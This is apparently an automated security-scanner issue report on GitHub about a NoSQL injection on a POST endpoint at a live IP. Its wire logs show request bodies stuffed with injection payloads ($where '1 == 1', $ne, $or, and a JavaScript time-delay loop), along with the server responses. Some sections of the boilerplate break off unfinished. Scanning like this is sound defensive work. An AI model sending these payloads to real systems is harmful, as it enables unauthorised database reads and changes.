muqeetkhan20 / JuneSanity


NoSQL_Injection on POST:/api/v1/issues/ui #2088

Open qauser21 opened 3 years ago

qauser21 commented 3 years ago

Title: NoSQL_Injection Vulnerability on POST:/api/v1/issues/ui
Project: Sanity 7th July
Description: The SQL Injection exploit allows an attacker to read/modify database records via API endpoint calls.

Assertion Name: NoSQL Injection ( 1 )

Overview: SQL Injection is an attack. It is executed by inserting, or “injecting”, a partial or complete SQL query via query parameters, request-body parameters or path parameters, which is then passed on to the application server/database.

NoSQL databases are vulnerable to attacks similar to those against SQL databases. API endpoints expose a much larger attack surface than web/mobile forms, allowing much deeper and more comprehensive attacks by injecting across all resource properties, query parameters, path parameters and headers.

Injection flaws, such as SQL, NoSQL and Command Injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” was consistently rated the number-one attack category by OWASP in 2010, 2013 and 2017 ( 2 ). SQL Injection is rated number one in the CWE / SANS Top 25 ( 3 ) ( 4 ).

Vulnerability Impact: A Successful SQL Injection attack

Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically correct SQL query. If the API returns an error for an incorrect query, it becomes much easier for the attacker to reconstruct the logic of the original query. If the error is hidden, the attacker may have to reverse engineer the query for exploitation. It might happen because of the following

Remediation: A successful SQL Injection attack can be avoided by following the Secure Coding Practices outlined in the OWASP SQL Injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
References:
  1. SQL Injection: https://www.owasp.org/index.php/SQL_Injection
  2. OWASP Top 10 – 2017 – A1 Injection: https://www.owasp.org/index.php/Top_10-2017_A1-Injection
  3. CWE – SANS – Top 25: http://cwe.mitre.org/top25/
  4. Common Weakness Enumeration – SQL Injection: http://cwe.mitre.org/data/definitions/89.html
  5. OWASP SQL Injection Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Risk: NoSQL_Injection
Severity: Critical
API Endpoint: http://95.217.118.53:8080/api/v1/issues/ui
Environment: Master
Playbook: ApiV1IssuesUiPostBodyParamNoSqlInjectionTimebound
Researcher: [apisec Bot]

QUICK TIPS

Suggestion: Avoid dynamic queries or use gateways/filters.
Effort Estimate: 3.0 Hrs
Wire Logs:
00:43:11 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:11 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:11 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:11 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:11 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "1, $where: '1 == 1'", "assignedTo" : "1, $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "1, $where: '1 == 1'", "endpoint" : "1, $where: '1 == 1'", "env" : "1, $where: '1 == 1'", "failedAssertions" : "1, $where: '1 == 1'", "headers" : [ "mHE9dYLJ" ], "id" : "", "inactive" : false, "issueName" : "1, $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "1, $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "1, $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "1, $where: '1 == 1'", "version" : "" }, "refId" : "1, $where: '1 == 1'", "version" : "" }, "requestBody" : "1, $where: '1 == 1'", "responseBody" : "1, $where: '1 == 1'", "responseHeaders" : "1, $where: '1 == 1'", "result" : "1, $where: '1 == 1'", "statusCode" : "1, $where: '1 == 1'", "tags" : [ "mHE9dYLJ" ], "version" : "" }]
00:43:11 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:11 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YTQ0OGZhOGMtOGNmMy00NWM2LWJjZGUtN2FiNjliOTczNTRm; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:10 GMT"]]
00:43:11 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:11.264+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:11 [D] [AVIUPBPNSITimebound] : Response time [587]
00:43:11 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:11 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [587 < 7000 OR 587 > 10000] result [Passed]
00:43:11 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:13 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:13 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:13 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:13 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:13 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "assignedTo" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "createdBy" : "", "createdDate" : "", "description" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "endpoint" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "env" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "failedAssertions" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "headers" : [ "lDvYXgaJ" ], "id" : "", "inactive" : false, "issueName" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "version" : "" }, "refId" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "version" : "" }, "requestBody" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "responseBody" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "responseHeaders" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "result" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "statusCode" : ", $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<3000); return true;})()"", "tags" : [ "lDvYXgaJ" ], "version" : "" }]
00:43:13 [D] [AVIUPBPNSITimebound] : Status code [400]
00:43:13 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NDlkNGQyN2YtOWE5OC00ZjcyLWJiNWItNDBhY2QwNDg5ODQ1; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:12 GMT", Connection:"close"]]
00:43:13 [D] [AVIUPBPNSITimebound] : Response [{ "timestamp" : "2021-08-05T00:43:13.056+0000", "status" : 400, "error" : "Bad Request", "message" : "JSON parse error: Unexpected character ('(' (code 40)): was expecting comma to separate Object entries; nested exception is com.fasterxml.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): was expecting comma to separate Object entries\n at [Source: (PushbackInputStream); line: 2, column: 31]", "path" : "/api/v1/issues/ui" }]
00:43:13 [D] [AVIUPBPNSITimebound] : Response time [1780]
00:43:13 [D] [AVIUPBPNSITimebound] : Response size [432]
00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [1780 < 7000 OR 1780 > 10000] result [Passed]
00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [400 != 404] result [Passed]
00:43:13 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:13 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:13 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:13 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:13 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "[$ne]=1", "assignedTo" : "[$ne]=1", "createdBy" : "", "createdDate" : "", "description" : "[$ne]=1", "endpoint" : "[$ne]=1", "env" : "[$ne]=1", "failedAssertions" : "[$ne]=1", "headers" : [ "6cLZv2vq" ], "id" : "", "inactive" : false, "issueName" : "[$ne]=1", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "[$ne]=1", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "[$ne]=1", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "[$ne]=1", "version" : "" }, "refId" : "[$ne]=1", "version" : "" }, "requestBody" : "[$ne]=1", "responseBody" : "[$ne]=1", "responseHeaders" : "[$ne]=1", "result" : "[$ne]=1", "statusCode" : "[$ne]=1", "tags" : [ "6cLZv2vq" ], "version" : "" }]
00:43:13 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:13 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NGUyN2VjZTYtZmNkNS00YmEzLWJkOTUtMDkyZTYyNGM1YmQ5; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:12 GMT"]]
00:43:13 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:13.837+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:13 [D] [AVIUPBPNSITimebound] : Response time [785]
00:43:13 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [785 < 7000 OR 785 > 10000] result [Passed]
00:43:13 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:20 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:20 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:20 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:20 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:20 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "', $or: [ {}, { 'a':'a", "assignedTo" : "', $or: [ {}, { 'a':'a", "createdBy" : "", "createdDate" : "", "description" : "', $or: [ {}, { 'a':'a", "endpoint" : "', $or: [ {}, { 'a':'a", "env" : "', $or: [ {}, { 'a':'a", "failedAssertions" : "', $or: [ {}, { 'a':'a", "headers" : [ "nXuDmWu3" ], "id" : "", "inactive" : false, "issueName" : "', $or: [ {}, { 'a':'a", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "', $or: [ {}, { 'a':'a", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $or: [ {}, { 'a':'a", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $or: [ {}, { 'a':'a", "version" : "" }, "refId" : "', $or: [ {}, { 'a':'a", "version" : "" }, "requestBody" : "', $or: [ {}, { 'a':'a", "responseBody" : "', $or: [ {}, { 'a':'a", "responseHeaders" : "', $or: [ {}, { 'a':'a", "result" : "', $or: [ {}, { 'a':'a", "statusCode" : "', $or: [ {}, { 'a':'a", "tags" : [ "nXuDmWu3" ], "version" : "" }]
00:43:20 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:20 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YzJjZDFhZTEtYTA2ZC00NzU4LWI1NzMtNmE5NmM3Njk4MmE3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:20 GMT"]]
00:43:20 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:20.892+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:20 [D] [AVIUPBPNSITimebound] : Response time [7051]
00:43:20 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:20 [E] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [7051 < 7000 OR 7051 > 10000] result [Failed]
00:43:20 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:21 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:21 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:21 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:21 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:21 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : ", $where: '1 == 1'", "assignedTo" : ", $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : ", $where: '1 == 1'", "endpoint" : ", $where: '1 == 1'", "env" : ", $where: '1 == 1'", "failedAssertions" : ", $where: '1 == 1'", "headers" : [ "ypFskP0D" ], "id" : "", "inactive" : false, "issueName" : ", $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : ", $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : ", $where: '1 == 1'", "version" : "" }, "refId" : ", $where: '1 == 1'", "version" : "" }, "requestBody" : ", $where: '1 == 1'", "responseBody" : ", $where: '1 == 1'", "responseHeaders" : ", $where: '1 == 1'", "result" : ", $where: '1 == 1'", "statusCode" : ", $where: '1 == 1'", "tags" : [ "ypFskP0D" ], "version" : "" }]
00:43:21 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:21 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MGFlNTkwM2QtMzJkYy00ZjNlLWJiMTMtMDBiMjAwZTUzODFi; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:20 GMT"]]
00:43:21 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:21.476+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:21 [D] [AVIUPBPNSITimebound] : Response time [582]
00:43:21 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:21 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [582 < 7000 OR 582 > 10000] result [Passed]
00:43:21 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:22 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:22 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:22 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:22 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:22 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "true, $where: '1 == 1'", "assignedTo" : "true, $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "true, $where: '1 == 1'", "endpoint" : "true, $where: '1 == 1'", "env" : "true, $where: '1 == 1'", "failedAssertions" : "true, $where: '1 == 1'", "headers" : [ "3JIzfKbg" ], "id" : "", "inactive" : false, "issueName" : "true, $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "true, $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "true, $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "true, $where: '1 == 1'", "version" : "" }, "refId" : "true, $where: '1 == 1'", "version" : "" }, "requestBody" : "true, $where: '1 == 1'", "responseBody" : "true, $where: '1 == 1'", "responseHeaders" : "true, $where: '1 == 1'", "result" : "true, $where: '1 == 1'", "statusCode" : "true, $where: '1 == 1'", "tags" : [ "3JIzfKbg" ], "version" : "" }]
00:43:22 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:22 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MjJkODdiZmYtOTU0OC00ZjU0LTk1NTktN2FjMWY2NmMzMTM2; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:21 GMT"]]
00:43:22 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:22.060+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:22 [D] [AVIUPBPNSITimebound] : Response time [583]
00:43:22 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [583 < 7000 OR 583 > 10000] result [Passed]
00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:22 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:22 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:22 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:22 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:22 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : " { $ne: 1 }", "assignedTo" : " { $ne: 1 }", "createdBy" : "", "createdDate" : "", "description" : " { $ne: 1 }", "endpoint" : " { $ne: 1 }", "env" : " { $ne: 1 }", "failedAssertions" : " { $ne: 1 }", "headers" : [ "Ju4Ssy3c" ], "id" : "", "inactive" : false, "issueName" : " { $ne: 1 }", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : " { $ne: 1 }", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " { $ne: 1 }", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " { $ne: 1 }", "version" : "" }, "refId" : " { $ne: 1 }", "version" : "" }, "requestBody" : " { $ne: 1 }", "responseBody" : " { $ne: 1 }", "responseHeaders" : " { $ne: 1 }", "result" : " { $ne: 1 }", "statusCode" : " { $ne: 1 }", "tags" : [ "Ju4Ssy3c" ], "version" : "" }]
00:43:22 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:22 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NTA4NTVjY2EtZTk0ZS00MTk5LWIyZDktN2E1NTJlY2ExMDMz; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:21 GMT"]]
00:43:22 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:22.646+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:22 [D] [AVIUPBPNSITimebound] : Response time [583]
00:43:22 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [583 < 7000 OR 583 > 10000] result [Passed]
00:43:22 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:23 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:23 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:23 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:23 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:23 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "', $where: '1 == 1'", "assignedTo" : "', $where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "', $where: '1 == 1'", "endpoint" : "', $where: '1 == 1'", "env" : "', $where: '1 == 1'", "failedAssertions" : "', $where: '1 == 1'", "headers" : [ "fu4mPhya" ], "id" : "", "inactive" : false, "issueName" : "', $where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "', $where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "', $where: '1 == 1'", "version" : "" }, "refId" : "', $where: '1 == 1'", "version" : "" }, "requestBody" : "', $where: '1 == 1'", "responseBody" : "', $where: '1 == 1'", "responseHeaders" : "', $where: '1 == 1'", "result" : "', $where: '1 == 1'", "statusCode" : "', $where: '1 == 1'", "tags" : [ "fu4mPhya" ], "version" : "" }]
00:43:23 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:23 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=NTFhMGFkYWItMjhjZC00OWRlLTk5NDQtZGQ2YjhlMTI3NjE1; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:22 GMT"]]
00:43:23 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:23.234+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:23 [D] [AVIUPBPNSITimebound] : Response time [593]
00:43:23 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [593 < 7000 OR 593 > 10000] result [Passed]
00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:23 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:23 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:23 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:23 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
00:43:23 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : "$where: '1 == 1'", "assignedTo" : "$where: '1 == 1'", "createdBy" : "", "createdDate" : "", "description" : "$where: '1 == 1'", "endpoint" : "$where: '1 == 1'", "env" : "$where: '1 == 1'", "failedAssertions" : "$where: '1 == 1'", "headers" : [ "sOB0pMfx" ], "id" : "", "inactive" : false, "issueName" : "$where: '1 == 1'", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : "$where: '1 == 1'", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "$where: '1 == 1'", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "$where: '1 == 1'", "version" : "" }, "refId" : "$where: '1 == 1'", "version" : "" }, "requestBody" : "$where: '1 == 1'", "responseBody" : "$where: '1 == 1'", "responseHeaders" : "$where: '1 == 1'", "result" : "$where: '1 == 1'", "statusCode" : "$where: '1 == 1'", "tags" : [ "sOB0pMfx" ], "version" : "" }]
00:43:23 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:23 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZDlkZDYyODQtNWQ1MS00Njc2LWJkYjUtMTY1ODdhMjRjNDg3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:23 GMT"]]
00:43:23 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:23.825+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:23 [D] [AVIUPBPNSITimebound] : Response time [589]
00:43:23 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [589 < 7000 OR 589 > 10000] result [Passed]
00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:43:24 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui]
00:43:24 [D] [AVIUPBPNSITimebound] : Method [POST]
00:43:24 [D] [AVIUPBPNSITimebound] : Authorization [Default]
00:43:24 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}]
